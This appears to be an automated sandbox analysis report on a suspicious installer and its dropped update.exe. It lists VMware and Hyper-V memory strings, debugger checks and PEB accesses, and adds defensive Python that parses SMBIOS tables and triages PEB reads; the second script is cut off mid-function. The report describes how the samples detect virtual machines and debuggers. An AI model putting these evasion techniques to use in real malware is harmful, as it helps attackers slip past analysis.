                    Source: ChameleonExplorer.exe, 0000000F.00000003.2873573699.0000000005315000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware Virtual RAM00000001VMW-4096MBR
                    Source: ChameleonExplorer.exe, 0000000F.00000003.1978831918.0000000003F1B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware
                    Source: ChameleonExplorer.exe, 00000004.00000003.1828228472.0000000002FDF000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: ..........................VMware, Inc..VMW201.00V.20829224.B64.2211211842.11/21/2022..........VMCqH.=....Z..;....VMware, Inc..None.VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0.VMware20,1.................Intel Corporation.440BX Desktop Reference Platform.None.None.......................No Enclosure.N/A.None.No Asset Tag.........P.P.|.@.....P...P...L1 CACHE.............|.@.............L2 CACHE.............|.@.............L3 CACHE...0..........
                    Source: ChameleonExplorer.exe, 0000000F.00000002.2960846322.00000000051F0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: neVMware-56 4d 43 71 48 15 3d ed-ae e6 t
                    Source: ChameleonExplorer.exe, 0000000F.00000002.2941663421.0000000002F37000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: Z#$prg$explorer#$type$trial#$ver$pro#$name$#$mail$#$date$02.02.2025#$hid$6E19BE071648A2A9#$ f0.VMware,1...
                    Source: ChameleonExplorer.exe, 0000000F.00000002.2941663421.0000000002F37000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: 25#$hid$6E19BE071648A2A9#$ f0.VMware,1...
                    Source: ChameleonExplorer.exe, 0000000F.00000003.1976606200.0000000003ED1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware%
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2472380344.00000000052BA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware, Inc.VMW201.00V
                    Source: ChameleonExplorer.exe, 0000000F.00000003.1976606200.0000000003ED1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware, Inc.VMW201.00V.20829224.B64.2211211842!
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2356525260.000000000528F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware, Inc.VMW201.00V.2082922
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2524980280.00000000052B4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware Virtual RAM00000001
                    Source: ETVk1yP43q.exe, 00000000.00000002.1796862019.0000000004BFF000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1776975922.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1778424639.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000002.1797004863.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 00000004.00000002.1831169359.0000000001468000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 00000004.00000002.1831169359.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1881508466.00000000014A4000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000002.1913050839.00000000014A4000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1889517245.00000000014A4000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000F.00000003.2027394233.0000000003F82000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                    Source: ChameleonExplorer.exe, 0000000F.00000002.2961914587.00000000068F0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: VMware, Inc.2
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2622200268.00000000052E4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f#
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2103152178.0000000005253000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware, Inc.NoneVMware-
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2186689308.0000000005235000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware, Inc.VMW201.00V.20829224.B64.221121184211/21/2022
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2922270437.0000000005340000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware, I
                    Source: ChameleonExplorer.exe, 0000000A.00000003.1881508466.00000000014A4000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000002.1913050839.00000000014A4000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1889517245.00000000014A4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RA
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2531677539.00000000052B6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware Virt
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2519969070.00000000052C4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware, Inc.VMW201.
                    Source: ChameleonExplorer.exe, 00000004.00000003.1775888949.0000000003D01000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: e6 c7 5a ec d9 3b f0VMware20,1
                    Source: ChameleonExplorer.exe, 0000000F.00000003.1976606200.0000000003ED1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware, Inc.NoneVMware%
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2245992714.0000000005263000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware, Inc.VMW201.00V.20829224.B6
                    Source: ChameleonExplorer.exe, 0000000F.00000003.1975888523.00000000016C0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: a ec d9 3b f0VMware20,1
                    Source: cexplorer.tmp, 00000002.00000003.1941924266.0000000000763000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}oj
                    Source: ChameleonExplorer.exe, 0000000A.00000003.1881508466.0000000001494000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8
                    Source: ChameleonExplorer.exe, 0000000F.00000002.2941663421.0000000002F29000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: 8VMware, Inc.VMW201.00V.20829224.B64.221121184211/21/2022
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2405817753.0000000005289000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware, Inc.VMW201.00V.20
                    Source: ChameleonExplorer.exe, 0000000F.00000002.2954474663.0000000003D5C000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: ..........................VMware, Inc..VMW201.00V.20829224.B64.2211211842.11/21/2022..........VMCqH.=....Z..;....VMware, Inc..None.VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0.VMware20,1.................Intel Corporation.440BX Desktop Reference Platform.None.None.......................No Enclosure.N/A.None.No Asset Tag.........P.P.|.@.....P...P...L1 CACHE.............|.@.............L2 CACHE.............|.@.............L3 CACHE...0..................s.s.A.............$.........CPU 0.GenuineIntel.Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz.........P.P.|.@.....P...P...L1 CACHE.............|.@.............L2 CACHE.............|.@.............L3 CACHE...0..................s.s.A.............$.........CPU 1.GenuineIntel.Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz...........J19.COM 1...........J23.Parallel...........J11.Keyboard...........J12.PS/2 Mouse..................xPCI Slot J11...................PCI Slot J12...................PCI Slot J13...................PCI Slot J14...................PCI Slot J15...................PCI Slot J16..........VMware SVGA II.ES1371.......[MS_VM_CERT/SHA1/27d66596a61c48dd3dc7216fd715126e33f59ae7].Welcome to the Virtual Machine...........P...@............(......@.@.............................VMware Virtual RAM.00000001.VMW-4096MB.RAM slot #0.RAM slot #0...(......................................RAM slot #1.RAM slot #1...(......................................RAM slot #6r
                    Source: ChameleonExplorer.exe, 00000004.00000003.1784725259.00000000014FC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0VMware20,1
                    Source: ChameleonExplorer.exe, 00000004.00000003.1777634471.00000000014FF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware,
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2918029112.0000000006BD0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware, Inc.NoneVMware-56 4d 43 71 48 15 3
                    Source: ChameleonExplorer.exe, 0000000A.00000003.1889517245.00000000014A4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll1
                    Source: ChameleonExplorer.exe, 0000000F.00000002.2954474663.0000000003CDD000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: ..........................VMware, Inc..VMW201.00V.20829224.B64.2211211842.11/21/2022..........VMCqH.=....Z..;....VMware, Inc..None.VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0.VMware20,1.................Intel Corporation.440BX Desktop Reference Platform.None.None.......................No Enclosure.N/A.None.No Asset Tag.........P.P.|.@.....P...P...L1 CACHE.............|.@.............L2 CACHE.............|.@.............L3 CACHE...0..................s.s.A.............$.........CPU 0.GenuineIntel.Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz.........P.P.|.@.....P...P...L1 CACHE.............|.@.............L2 CACHE.............|.@.............L3 CACHE...0..................s.s.A.............$.........CPU 1.GenuineIntel.Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz...........J19.COM 1...........J23.Parallel...........J11.Keyboard...........J12.PS/2 Mouse..................xPCI Slot J11...................PCI Slot J12...................PCI Slot J13...................PCI Slot J14...................PCI Slot J15...................PCI Slot J16..........VMware SVGA II.ES1371.......[MS_VM_CERT/SHA1/27d66596a61c48dd3dc7216fd715126e33f59ae7].Welcome to the Virtual Machine...........P...@............(......@.@.............................VMware Virtual RAM.00000001.VMW-4096MB.RAM slot #0.RAM slot #0...(......................................RAM slot #1.RAM slot #1...(......................................RAM slot #2.RAM slot #2...(......................................RAM slot #3.RAM slot #3...(......................................RAM slot #4.RAM slot #4...(......................................RAM slot #5.RAM slot #5...(......................................RAM slot #6.RAM slot #6...( .....................................RAM slot #7.RAM slot #7...(!.....................................RAM slot #8.RAM slot 
#8...(".....................................RAM slot #9.RAM slot #9...(#.....................................RAM slot #10.RAM slot #10...($.....................................RAM slot #11.RAM slot #11...(%.....................................RAM slot #12.RAM slot #12...(&.....................................RAM slot #13.RAM slot #1
                    Source: ChameleonExplorer.exe, 0000000F.00000002.2961914587.00000000068F8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMware20,1
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2186689308.0000000005235000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware20,1
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2705794028.0000000005366000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-56 4d 43 71 48 15 3d ed-
                    Source: ChameleonExplorer.exe, 0000000F.00000002.2961914587.00000000068F8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: VMware, Inc.Q
                    Source: ChameleonExplorer.exe, 0000000F.00000002.2961914587.0000000006925000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: G..........................VMware, Inc..VMW201.00V.20829224.B64.22112118
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2124391410.0000000005202000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.V
                    Source: ChameleonExplorer.exe, 0000000F.00000002.2961914587.0000000006940000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: VMware, Inc.40 GHz
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2910920140.0000000006BCE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-56 4d 43 71 48 15
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2089915677.0000000005251000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-5
                    Source: ChameleonExplorer.exe, 0000000F.00000003.1976724503.0000000001685000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllC
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2668005016.00000000052E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SVGA
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2495718047.00000000052B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMW201.00
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2251843600.000000000525C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMW201.00V.20829224.B
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2048081260.00000000051FA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-56 4d 43 71 48 15 3d
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2186689308.0000000005235000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2876513835.0000000006BD6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2431025620.000000000528D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMW201.00V.2
                    Source: ChameleonExplorer.exe, 00000004.00000003.1777634471.00000000014FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: eVMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0VMware20,1
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2610909014.000000000533C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-56 4d 43 71 48 15 3d ed-ae
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2902133677.0000000006BD8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-56 4d 43 71 48 15 3d ed-ae e
                    Source: ChameleonExplorer.exe, 0000000F.00000003.1972458417.00000000016B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM00000001VMW-4096MBRAM slot #0R
                    Source: ChameleonExplorer.exe, 0000000F.00000002.2934722928.00000000016B0000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000F.00000003.1979014685.00000000016B0000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000F.00000003.1973121727.0000000001685000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000F.00000003.1980218916.00000000016B3000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000F.00000003.1972544714.0000000001685000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: ChameleonExplorer.exe, 0000000F.00000002.2941663421.0000000002F37000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: ..........................VMware, Inc..VMW201.00V.20829224.B64.2211211842.11/21/2022..........VMCqH.=....Z..;....VMware, Inc..None.VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0.VMware20,1...
                    Source: ChameleonExplorer.exe, 0000000A.00000003.1886328902.00000000014DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMW201.00V.20829224.B64.22112118426
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2773167616.0000000005362000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-56 4d 43 71 48 15 3d ed-ae e6
                    Source: ChameleonExplorer.exe, 00000004.00000003.1828228472.000000000303F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMware20,1.RangeException\CurVer
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2920370385.0000000006BD0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-56 4d 43 71 48 15 3d
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2902133677.0000000006BDC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-56 4d 43 71 4
                    Source: ChameleonExplorer.exe, 0000000F.00000002.2961914587.00000000068F8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: VMware20,1@
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2664157391.0000000005344000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-56 4d 43 71 48 15 3d ed-a
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2186689308.0000000005235000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM00000001VMW-4096MBRAM slot #0RAM slot #0
                    Source: ChameleonExplorer.exe, 00000004.00000003.1828228472.0000000002F9E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: .......PCI Slot J16..........VMware SVGA II.ES1371.......[MS_VM_CERT/SHA1/27d66596a61c48dd3dc7216fd715126e33f59ae7].Welcome to the Virtual Machine...........P...@............(......@.@.............................VMware Virtual RAM.00000001.VMW-4096MB.RAM slot #0.RAM slot #0...(......................................RAM slot #1.RAM slot #1...(......................................RAM slot #2.RAM slot #2...(......................................RAM slot #3.RAM slot #3...(......................................RAM slot #4.RAM slot #4...(......................................RAM slot #5.RAM slot #5...(......................................RAM slot #6.RAM slot #6...( .....................................RAM slot #7.RAM slot #7...(!.....................................RAM slot #8.RAM slot #8...(".....................................RAM slot #9.RAM slot #9...(#.....................................RAM slot #10.RAM slot #10...($.....................................RAM slot #11.RAM slot #11...(%.....................................RAM slot #12.RAM slot #12...(&.....................................RAM slot #13.RAM slot #1
                    Source: ChameleonExplorer.exe, 00000004.00000003.1828228472.0000000002FA5000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: .......PCI Slot J16..........VMware SVGA II.ES1371.......[MS_VM_CERT/SHA1/27d66596a61c48dd3dc7216fd715126e33f59ae7].Welcome to the Virtual Machine...........P...@............(......@.@.............................VMware Virtual RAM.00000001.VMW-4096MB.RAM slot #0.RAM slot #0...(......................................RAM slot #1.RAM slot #1...(......................................RAM slot #2.RAM slot #2...(......................................RAM slot #3.RAM slot #3...(......................................RAM slot #4.RAM slot #4...(......................................RAM slot #5.RAM slot #5...(......................................RAM slot #6.RAM slot #6...( .....................................RAM slot #7.RAM slot #7...(!.....................................RAM slot #8.RAM slot #8...(".....................................RAM slot #9.RAM slot #9...(#.....................................RAM slot #10.RAM slot #10...($.....................................RAM slot #11.RAM slot #11...(%.....................................RAM slot #12.RAM slot #12...(&.....................................RAM slot #13.RAM slot #1#14
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2565637552.00000000052E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMW20
                    Source: update.exe, 00000015.00000003.2482146112.0000000000792000.00000004.00000020.00020000.00000000.sdmp, update.exe, 00000015.00000003.2470147501.0000000000792000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWL
                    Source: ChameleonExplorer.exe, 0000000A.00000003.1892792401.00000000014DC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware-56 4d 43 71 48 13
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2910681278.000000000533A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc
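The VMware strings above (manufacturer, the "VMware20,1" product, the VMW201.00V BIOS version, the "VMware-56 4d ..." serial, "VMware Virtual RAM") are the string areas of the SMBIOS tables that Windows exposes through the root\WMI class MSSMBios_RawSMBiosTables, which the report lists among the sample's queries. The parser below is added here as an example and is not code from the report or from the sample: it walks the raw table format (type, length, handle, formatted area, NUL-terminated strings closed by a double NUL), pulls the Type 0 (BIOS) and Type 1 (System) identity fields that VM checks read, and flags hypervisor vendor markers. The embedded table is constructed for the example and reuses the vendor, version, product and serial strings quoted in this report; its layout, the marker list and the hypervisor_hits scoring are the example's own. One caveat before turning these strings into a detection: "Hyper-V RAW" next to %SystemRoot%\system32\mswsock.dll is the name of the Hyper-V socket Winsock provider that every Windows 10 or later installation carries, physical or virtual, so it says nothing about running inside a VM.

```python
import struct
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Substrings that, in SMBIOS identity fields, point at a hypervisor.  The list is
# this example's own choice, not something the report defines.
HYPERVISOR_MARKERS = ("vmware", "virtualbox", "innotek", "qemu", "kvm", "xen",
                      "parallels", "bochs", "virtual machine")


@dataclass
class SmbiosStruct:
    stype: int
    handle: int
    formatted: bytes        # bytes after the 4-byte header, up to `length`
    strings: List[str]      # strings area, in index order

    def string(self, idx: int) -> str:
        # String fields hold 1-based indices into the strings area; 0 = not set.
        return self.strings[idx - 1] if 0 < idx <= len(self.strings) else ""


def parse_smbios(table: bytes) -> List[SmbiosStruct]:
    """Walk a raw SMBIOS table: header (type, length, handle), formatted area,
    then NUL-terminated strings closed by an empty string (double NUL)."""
    structs: List[SmbiosStruct] = []
    pos = 0
    while pos + 4 <= len(table):
        stype, length, handle = struct.unpack_from("<BBH", table, pos)
        if length < 4:                      # malformed header: stop, do not loop
            break
        formatted = table[pos + 4:pos + length]
        p = pos + length
        strings: List[str] = []
        while p < len(table):
            end = table.find(b"\x00", p)
            if end == -1:
                end = len(table)
            if end == p:                    # empty string terminates the area
                break
            strings.append(table[p:end].decode("latin-1", "replace"))
            p = end + 1
        p += 2 if not strings else 1        # no strings => the area is just two NULs
        structs.append(SmbiosStruct(stype, handle, formatted, strings))
        if stype == 127:                    # End-of-Table structure
            break
        pos = p
    return structs


def hardware_identity(structs: List[SmbiosStruct]) -> Dict[str, str]:
    """Type 0 (BIOS) and Type 1 (System) fields that VM checks typically read."""
    info: Dict[str, str] = {}
    for s in structs:
        f = s.formatted
        if s.stype == 0 and len(f) >= 5:
            info["bios_vendor"] = s.string(f[0])     # structure offset 0x04
            info["bios_version"] = s.string(f[1])    # 0x05
            info["bios_date"] = s.string(f[4])       # 0x08
        elif s.stype == 1 and len(f) >= 4:
            info["manufacturer"] = s.string(f[0])    # 0x04
            info["product"] = s.string(f[1])         # 0x05
            info["version"] = s.string(f[2])         # 0x06
            info["serial"] = s.string(f[3])          # 0x07
    return info


def hypervisor_hits(info: Dict[str, str]) -> List[str]:
    hits = []
    for key in ("manufacturer", "product", "bios_vendor", "serial"):
        value = info.get(key, "")
        for marker in HYPERVISOR_MARKERS:
            if marker in value.lower():
                hits.append(f"{key}={value!r} matches {marker!r}")
                break
    return hits


def _structure(stype: int, formatted: bytes, strings: List[str]) -> bytes:
    """Build one SMBIOS structure for the constructed sample table (handle := type)."""
    header = struct.pack("<BBH", stype, 4 + len(formatted), stype)
    area = b"".join(s.encode("latin-1") + b"\x00" for s in strings) + b"\x00"
    if not strings:
        area = b"\x00\x00"
    return header + formatted + area


# Constructed sample table.  The vendor, version, product and serial strings are the
# ones quoted in this report's memory strings; the layout is the example's own.
SAMPLE_TABLE = (
    _structure(0, bytes([1, 2, 0x00, 0xE8, 3]) + b"\x00" * 15,
               ["VMware, Inc.", "VMW201.00V.20829224.B64.2211211842", "11/21/2022"])
    + _structure(1, bytes([1, 2, 3, 4]) + bytes(range(16)) + bytes([6, 0, 0]),
                 ["VMware, Inc.", "VMware20,1", "None",
                  "VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0"])
    + _structure(127, b"", [])
)


def analyze(table: bytes = SAMPLE_TABLE) -> Tuple[Dict[str, str], List[str]]:
    info = hardware_identity(parse_smbios(table))
    return info, hypervisor_hits(info)


if __name__ == "__main__":
    identity, hits = analyze()
    for k, v in identity.items():
        print(f"{k:13} {v}")
    print("hypervisor markers:", *hits, sep="\n  ")
```

On a live host the same bytes come from the SMBiosData property of MSSMBios_RawSMBiosTables in root\WMI, or from GetSystemFirmwareTable('RSMB'), which prefixes the table with an 8-byte RawSMBIOSData header that must be skipped before calling parse_smbios.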
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp API call chain: ExitProcess graph end node
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe API call chain: ExitProcess graph end node
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp Process information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exeCode function: 0_2_00415B09 IsDebuggerPresent,0_2_00415B09
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exeCode function: 0_2_00415CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00415CCC
                    Source: C:\Users\user\AppData\Roaming\update.exeCode function: 21_2_004162B0 LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,GetCurrentProcessId,21_2_004162B0
                    Source: C:\Users\user\AppData\Roaming\update.exeCode function: 21_2_00417236 LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,21_2_00417236
                    Source: C:\Users\user\AppData\Roaming\update.exeCode function: 3_2_007A2460 mov eax, dword ptr fs:[00000030h]3_2_007A2460
                    Source: C:\Users\user\AppData\Roaming\update.exeCode function: 3_2_007A11FC mov eax, dword ptr fs:[00000030h]3_2_007A11FC
                    Source: C:\Users\user\AppData\Roaming\update.exeCode function: 3_2_007A11EF mov eax, dword ptr fs:[00000030h]3_2_007A11EF
                    Source: C:\Users\user\AppData\Roaming\update.exeCode function: 3_2_007A0FB7 mov eax, dword ptr fs:[00000030h]3_2_007A0FB7
                    Source: C:\Users\user\AppData\Roaming\update.exeCode function: 3_2_007A1180 mov eax, dword ptr fs:[00000030h]3_2_007A1180
                    Source: C:\Users\user\AppData\Roaming\update.exeCode function: 21_2_00407AF0 mov eax, dword ptr fs:[00000030h]21_2_00407AF0
                    Source: C:\Users\user\AppData\Roaming\update.exeCode function: 21_2_006011EF mov eax, dword ptr fs:[00000030h]21_2_006011EF
                    Source: C:\Users\user\AppData\Roaming\update.exeCode function: 21_2_006011FC mov eax, dword ptr fs:[00000030h]21_2_006011FC
                    Source: C:\Users\user\AppData\Roaming\update.exeCode function: 21_2_00601180 mov eax, dword ptr fs:[00000030h]21_2_00601180
                    Source: C:\Users\user\AppData\Roaming\update.exeCode function: 21_2_00602460 mov eax, dword ptr fs:[00000030h]21_2_00602460
                    Source: C:\Users\user\AppData\Roaming\update.exeCode function: 21_2_00600FB7 mov eax, dword ptr fs:[00000030h]21_2_00600FB7
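The fs:[00000030h] loads listed above for update.exe fetch the PEB pointer. That load by itself is not a debugger check: the same instruction starts the PEB->Ldr walk that loaders use to find kernel32 and resolve imports by hand, so the field read in the next instruction is what separates BeingDebugged (offset 0x02) and NtGlobalFlag (0x68) checks from Ldr (0x0C) lookups. Likewise, the IsDebuggerPresent/OutputDebugStringW pair flagged in ETVk1yP43q.exe at 0_2_00415CCC sits between ___crtIsPackagedApp and EncodePointer calls, which is Microsoft C runtime code rather than a check the author wrote. The triage below is added here as an example and is not code from the report or from the sample: it finds the 32-bit encodings of the fs:[0x30] load in a code buffer and classifies the memory read that follows. The buffer it scans is constructed for the example; the verdict labels are the example's own.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

REGS = ("eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi")

# x86 (32-bit) PEB fields that commonly follow a fs:[0x30] load, and what reading
# them usually means.  Offsets are the documented PEB layout; the verdict labels are
# this example's own.
PEB_FIELDS: Dict[int, tuple] = {
    0x02: ("BeingDebugged", "anti-debug"),
    0x0C: ("Ldr", "api-resolution"),
    0x18: ("ProcessHeap", "possible anti-debug (heap Flags/ForceFlags)"),
    0x68: ("NtGlobalFlag", "anti-debug"),
}

# 64 A1 30 00 00 00        mov eax, fs:[0x30]
# 64 8B /r 30 00 00 00     mov r32, fs:[0x30]   (modrm 00 rrr 101 = disp32)
PEB_LOAD = re.compile(
    rb"\x64(?:\xA1|\x8B[\x05\x0D\x15\x1D\x25\x2D\x35\x3D])\x30\x00\x00\x00")


@dataclass
class PebAccess:
    offset: int
    reg: str            # register that now holds the PEB pointer
    field: str          # PEB field read next, or "unknown"
    verdict: str


def _dest_register(match: bytes) -> int:
    # Short form A1 always targets eax; otherwise take the reg bits of the modrm byte.
    return 0 if match[1] == 0xA1 else (match[2] >> 3) & 7


def _next_read_disp(code: bytes, p: int, rm: int) -> Optional[int]:
    """disp8 of a [reg+disp8] read placed right after the PEB load, if any."""
    if rm == 4:                               # rm=100 needs a SIB byte; not handled
        return None
    nxt = code[p:p + 4]
    # mov r32, [reg+disp8]               8B  01 rrr rm  disp8
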